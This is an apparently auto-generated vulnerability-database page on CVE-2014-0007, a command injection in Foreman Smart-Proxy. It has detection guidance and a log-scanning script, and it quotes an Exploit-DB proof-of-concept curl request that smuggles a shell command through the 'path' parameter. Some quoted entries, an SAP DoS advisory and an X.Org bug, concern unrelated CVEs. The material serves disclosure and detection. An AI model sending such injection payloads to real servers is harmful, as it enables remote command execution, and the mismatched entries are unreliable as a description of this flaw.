CVE-2014-0007
Published 2014-06-20
Priority: P2 · 63 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 9.02% (94.6th percentile)
The Smart-Proxy in Foreman before 1.4.5 and 1.5.x before 1.5.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the path parameter to tftp/fetch_boot_file.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| theforeman | foreman | <= 1.4.4 | — |
| theforeman | foreman | — | — |
| theforeman | foreman | — | — |
| theforeman | foreman | — | — |
| theforeman | foreman | — | — |
| theforeman | foreman | — | — |
Detection & IOCs (extracted from sources)
- Look for HTTP POST requests to /tftp/fetch_boot_file containing shell metacharacters (e.g., semicolons, URL-encoded as %3B) in the 'path' query parameter, indicating command injection attempts.
- Monitor for POST requests to the Foreman Smart-Proxy endpoint on port 8443 with Accept: application/json header and a 'path' parameter containing URL-encoded shell metacharacters such as %3B (semicolon).
- The vulnerable code path is in tftp.rb within the smart-proxy; monitor for unexpected process spawning from the foreman-proxy user, especially shell commands not initiated by normal TFTP boot file fetch operations.
- Affected versions are Foreman before 1.4.5 and 1.5.x before 1.5.1; ensure foreman-proxy is patched to 1.4.5+ or 1.5.1+ to remediate.
- Exploitation runs with the privileges of the foreman-proxy user; assess the privilege level of this account in your environment to gauge blast radius.
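The first two indicators above can be checked against proxy or load-balancer access logs. The following is an added example, not code from Foreman or from the sources quoted on this page; it assumes Common Log Format-style lines, the function names are hypothetical, and the sample lines are constructed (the second reuses the request shown in the Exploit-DB entry on this page).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: client address first, request line in double quotes.
LINE_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
ENDPOINT = "/tftp/fetch_boot_file"
# Characters a POSIX shell treats specially. A legitimate boot-file URL
# containing '&' would also match, so tune this set for your environment.
SHELL_META = frozenset(";|&`$()<>\\\n\r")


def injected_path(line):
    """Return (client, decoded path value, metacharacters) or None."""
    m = LINE_RE.match(line)
    if not m or m.group("method") != "POST":
        return None
    target = urlsplit(m.group("target"))
    if target.path.rstrip("/") != ENDPOINT:
        return None
    # parse_qs percent-decodes each value, so %3B is compared as ';'.
    for value in parse_qs(target.query, keep_blank_values=True).get("path", []):
        hits = sorted(SHELL_META & set(value))
        if hits:
            return m.group("client"), value, hits
    return None


def scan(lines):
    """Run the check over an iterable of log lines and keep the matches."""
    return [hit for hit in map(injected_path, lines) if hit]


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jun/2014:10:00:01 +0000] "POST /tftp/fetch_boot_file'
    '?prefix=boot/f20&path=http%3A%2F%2Fmirror.example.com%2Fpub%2Fvmlinuz HTTP/1.1" 200 2',
    '192.0.2.66 - - [05/Jun/2014:10:03:17 +0000] "POST /tftp/fetch_boot_file'
    '?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B HTTP/1.1" 200 2',
    '192.0.2.10 - - [05/Jun/2014:10:04:00 +0000] "GET /features HTTP/1.1" 200 30',
    '192.0.2.10 - - [05/Jun/2014:10:05:00 +0000] "POST /tftp/create_default'
    '?path=a%3Bb HTTP/1.1" 200 2',
]

if __name__ == "__main__":
    for client, value, chars in scan(SAMPLE_LOG):
        print(f"{client} sent path={value!r} containing {chars}")
```

Only the query string is inspected, so a request that carries `path` in the POST body will not appear in an access log and needs application-level logging to be caught.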
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 7.5 HIGH
Red Hat
foreman-proxy: smart-proxy remote command injection
vendor_redhat·2014-06-18·CVSS 7.5
CVE-2014-0007 [HIGH] CWE-78 foreman-proxy: smart-proxy remote command injection
The Smart-Proxy in Foreman before 1.4.5 and 1.5.x before 1.5.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the path parameter to tftp/fetch_boot_file.
Package: foreman-proxy (Red Hat Enterprise Linux OpenStack Platform 5 (Icehouse)) - Affected
GHSA
GHSA-4ffx-rh24-gpxh: The Smart-Proxy in Foreman before 1
ghsa_unreviewed·2022-05-17
CVE-2014-0007 [HIGH] GHSA-4ffx-rh24-gpxh: The Smart-Proxy in Foreman before 1
The Smart-Proxy in Foreman before 1.4.5 and 1.5.x before 1.5.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the path parameter to tftp/fetch_boot_file.
No detection rules found.
Exploit-DB
SAP NetWeaver Enqueue Server - Denial of Service
exploitdb·2014-10-17·CVSS 5.0
CVE-2014-0995 [MEDIUM] SAP NetWeaver Enqueue Server - Denial of Service
---
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
1. **Advisory Information**
Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
Advisory ID: CORE-2014-0007
Advisory URL: http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
Date published: 2014-10-15
Date of last update: 2014-10-15
Vendors contacted: SAP
Release mode: Coordinated release
2. **Vulnerability Information**
Class: Uncontrolled Recursion [CWE-674]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0995
3. **Vulnerability Description**
SAP Netw
Exploit-DB
Foreman Smart-Proxy - Remote Command Injection
exploitdb·2014-06-05
CVE-2014-0007 Foreman Smart-Proxy - Remote Command Injection
---
source: https://www.securityfocus.com/bid/68117/info
Foreman is prone to a remote command-injection vulnerability.
Successful exploits will result in the execution of arbitrary commands with the privileges of the user running foreman-proxy.
curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://www.example.com:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B'
Bugzilla
CVE-2014-8097 xorg-x11-server: out of bounds access due to not validating length or offset values in DBE extension
bugzilla·2014-11-27·CVSS 6.5
CVE-2014-8097 [MEDIUM] CVE-2014-8097 xorg-x11-server: out of bounds access due to not validating length or offset values in DBE extension
ProcDbeSwapBuffers() and SProcDbeSwapBuffers() DBE extension calls do not check that the lengths and/or indexes sent by the
client are within the bounds specified by the caller or the bounds of
the memory allocated to hold the request read from the client, so could
read or write past the bounds of allocated memory while processing the
request. These calls all occur only after a client has successfully
authenticated itself.
Introduced in X11R6.1 (1996).
Discussion:
Created attachment 962137
0007-dbe_unvalidated_lengths_in_DbeSwapBuffers_calls_CVE-2014-8097.patch
---
Integer overflow causing OOB read and crash. Could also result in OOB data being sent to the client, result
Bugzilla
CVE-2014-0007 foreman-proxy: smart-proxy remote command injection
bugzilla·2014-06-06·CVSS 7.5
CVE-2014-0007 [HIGH] CVE-2014-0007 foreman-proxy: smart-proxy remote command injection
Lukas Zap of Red Hat reports:
The smart proxy contains a check in tftp.rb to ensure that a specific web URL
exists and is valid, this check is vulnerable to a command injection
vulnerability.
Discussion:
Public via: http://projects.theforeman.org/issues/6086
---
Acknowledgements:
This issue was discovered by Lukas Zapletal of Red Hat.
---
This issue has been addressed in following products:
OpenStack 4 for RHEL 6
OpenStack 3 for RHEL 6
Via RHSA-2014:0770 https://rhn.redhat.com/errata/RHSA-2014-0770.html
Published: 2014-06-20